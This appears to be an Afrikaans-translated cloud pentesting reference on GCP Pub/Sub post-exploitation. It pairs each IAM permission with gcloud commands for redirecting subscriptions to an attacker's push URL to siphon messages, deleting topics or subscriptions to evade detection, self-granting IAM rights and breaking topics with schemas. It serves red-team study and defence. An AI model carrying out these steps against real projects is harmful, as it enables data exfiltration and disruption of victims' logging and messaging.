GCP - Pub/Sub Post Exploitation

Pub/Sub

Vir meer inligting oor Pub/Sub kyk na die volgende bladsy:

pubsub.topics.publish

Publiseer 'n boodskap in 'n onderwerp, nuttig om onverwagte data te stuur en onverwagte funksies te aktiveer of kwesbaarhede te benut:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Nuttig om 'n subskripsie te verhoed om boodskappe te ontvang, dalk om opsporing te vermy.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Nuttig om te voorkom dat 'n intekening boodskappe ontvang, dalk om opsporing te vermy. Dit is moontlik om 'n onderwerp te verwyder selfs met intekeninge wat daaraan geheg is.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Gebruik hierdie toestemming om 'n instelling van die onderwerp op te dateer om dit te ontwrig, soos --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Gee jouself toestemming om enige van die vorige aanvalle uit te voer.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Kry al die boodskappe in 'n webbediener:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Skep 'n intekening en gebruik dit om boodskappe te trek:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Verwyder 'n subskripsie kan nuttig wees om 'n logverwerkingsstelsel of iets soortgelyks te ontwrig:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Gebruik hierdie toestemming om 'n paar instellings op te dateer sodat boodskappe in 'n plek gestoor word wat jy kan toegang (URL, Big Query tafel, Bucket) of net om dit te ontwrig.

gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>

pubsub.subscriptions.setIamPolicy

Gee jouself die toestemmings wat nodig is om enige van die voorheen kommentaar gemaak aanvalle uit te voer.

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Aanval 'n skema op 'n onderwerp sodat die boodskappe dit nie vervul nie en daarom die onderwerp ontwrig word. As daar nie enige skemas is nie, mag jy een moet skep.

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

pubsub.schemas.delete

Dit mag lyk soos om 'n skema te verwyder, maar jy sal in staat wees om boodskappe te stuur wat nie aan die skema voldoen nie. Tog, aangesien die skema verwyder sal word, sal geen boodskap werklik in die onderwerp inkom nie. So dit is NUTTIG:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.setIamPolicy

Gee jouself die toestemmings wat nodig is om enige van die voorheen kommentaar gemaak aanvalle uit te voer.

pubsub.snapshots.create, pubsub.snapshots.seek

Dit sal 'n snapshot van al die onACKed boodskappe skep en dit terug na die inskrywing plaas. Nie baie nuttig vir 'n aanvaller nie, maar hier is dit:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME